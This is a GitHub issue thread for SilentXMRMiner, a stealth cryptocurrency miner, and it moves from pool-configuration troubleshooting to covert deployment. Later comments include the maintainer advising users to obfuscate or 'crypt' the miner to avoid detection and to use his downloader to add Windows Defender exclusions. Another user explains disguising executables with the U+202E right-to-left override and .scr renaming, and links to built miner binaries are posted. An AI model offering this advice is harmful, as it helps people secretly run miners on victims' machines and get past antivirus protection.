### ISSUE TITLE
Monero ocean pool

### ISSUE THREAD

**Issue by Zzatiz** [UnamSanctam/SilentXMRMiner#383]
Mines and works perfect but does not show progress on monero ocean pool site meaning it does not show there is an active worker or hashes coming in after waiting way more than a few minutes

**Comment by UnamSanctam** [comment]
Check that all the settings are correct, though from experience it can take up to 30 minutes for Moneroocean to update the statistics correctly.

**Comment by Zzatiz** [comment]
I’ve tried everything won’t work on monero ocean, can someone show me the “correct settings”?

**Comment by UnamSanctam** [comment]
You can post them here, does it show 0 H/s or just no worker? Did you enter a password (worker name)?

**Comment by Zzatiz** [comment]
Ah I did not put a password, where do I find the worker name for monero ocean?

Get Outlook for iOS<https://aka.ms/o0ukef>
________________________________

**Comment by UnamSanctam** [comment]
Enter the worker name (whatever you want) into the password field and it will show up on the pool under that worker.

**Comment by Zzatiz** [comment]
I still cannot get any result, I’ve put this as well as the older cpu port as I have one still no result. Possibly I did not set up the miner creator program right in the first place? [Image.jpeg]
[Image.jpeg]
Also it shows little cpu usage on some miners I make when I have stealth turned off, other miners I make it is fine.
Get Outlook for iOS<https://aka.ms/o0ukef>
________________________________

**Comment by UnamSanctam** [comment]
I don't think you can attach an image via email replies so there's no image visible in your post. If it shows any CPU usage then it should be working fine since it can't use any CPU usage unless it gets a job from the pool.

**Comment by Zzatiz** [comment]
![image](https://user-images.githubusercontent.com/88599140/128646699-fc7d95ce-8bb2-4a96-abc7-59457ab9cf77.jpeg)
![image](https://user-images.githubusercontent.com/88599140/128646701-83abc78c-a6d8-42fa-8267-475cd38a77c9.jpeg)

**Comment by UnamSanctam** [comment]
Hmm that looks correct, how many CPU cores and RAM does that machine have? Can you send the miner here and I'll test it?

**Comment by Zzatiz** [comment]
4 cores and 4 gigs of ram ddr1600 win 10 sure give me a minute

Get Outlook for iOS<https://aka.ms/o0ukef>
________________________________

**Comment by UnamSanctam** [comment]
RandomX (The Monero algorithm) uses 2GB of RAM to calculate efficiently so if you don't have enough RAM for that then it will mine quite slowly. You can try another algorithm (another cryptocurrency, though MoneroOcean supports mining multiple algorithms/cryptocurrencies while being paid in XMR) though most computers will have enough RAM to mine with RandomX.

**Comment by Zzatiz** [comment]
[](https://file.io/0BKd7VxEYRmJ) - miner
[](https://file.io/PVPAe2LbY81F)  - uninstaller

**Comment by Zzatiz** [comment]
https://file.io/0UCqAQbyKBIF - miner
https://file.io/TGA3DgGlzSaI - uninstaller

**Comment by Zzatiz** [comment]
Ah I see ill try that thank you.

**Comment by UnamSanctam** [comment]
Your miner work fine for me, I would guess it's a computer (maybe CPU core or RAM) issue maybe.

**Comment by Zzatiz** [comment]
Thank you man, I’m trying to make a miner for lower end 32 bit computers is there a workaround?

Get Outlook for iOS<https://aka.ms/o0ukef>
________________________________

**Comment by UnamSanctam** [comment]
You can use a less demanding algorithm for lower end computers but there won't be any support for 32-bit. 32-bit makes the miner way too slow from experience, and it would require old libraries and things as well. XMRig dropped support for 32-bit quite a while ago.

**Comment by Zzatiz** [comment]
I switched to astrobwt algorithm and it fixed the problem thank you so much

Get Outlook for iOS<https://aka.ms/o0ukef>
________________________________

**Comment by UnamSanctam** [comment]
Great, not sure if "Max CPU" works for the astrobwt algorithm though (due to how it works) just so you know.

**Comment by Zzatiz** [comment]
Hey how can I make my miner an auto run exe for usb? Do I need to crypt it?

**Comment by UnamSanctam** [comment]
Well, you can't make files autorun without any input anymore, that was fixed a long time ago. You can make an autorun file and then when the USB is inserted the computer will ask if you want to run that file. You need to obfusate/crypt the miner if you want to reduce detections since it's a public and open source project.

**Comment by freakovision** [comment]
I used to trick people to run my executable using "Right to left override" symbol.
You can use `U+202E` unicode symbol to turn your executable from `virus.exe` to `virus‮gnp.exe`

**Comment by Toxenskiy** [comment]
![image](https://user-images.githubusercontent.com/55586522/129449457-af7339da-b048-4b9f-ac47-ebe7c95dd37a.png)

**Comment by Toxenskiy** [comment]
this method does not work for a year, so from 2018-2019 it may be earlier

**Comment by UnamSanctam** [comment]
It works for all things which can display Unicode characters. So it works for the Windows explorer and such.

**Comment by freakovision** [comment]
Also if you can conver `.exe` to `.scr` that would look a lot less suspicious. There's no words that ends with exe unfortunately.

**Comment by Toxenskiy** [comment]
flexe ;)

**Comment by Zzatiz** [comment]
Can someone reccomend me a crypter that will work with my miner I made

Get Outlook for iOS<https://aka.ms/o0ukef>
________________________________

**Comment by UnamSanctam** [comment]
If you can be satisfied with it being undetected by Windows Defender then you can try using my downloader to add Windows Defender exclusions before downloading the miner from some URL you provide https://github.com/UnamSanctam/UnamDownloader.
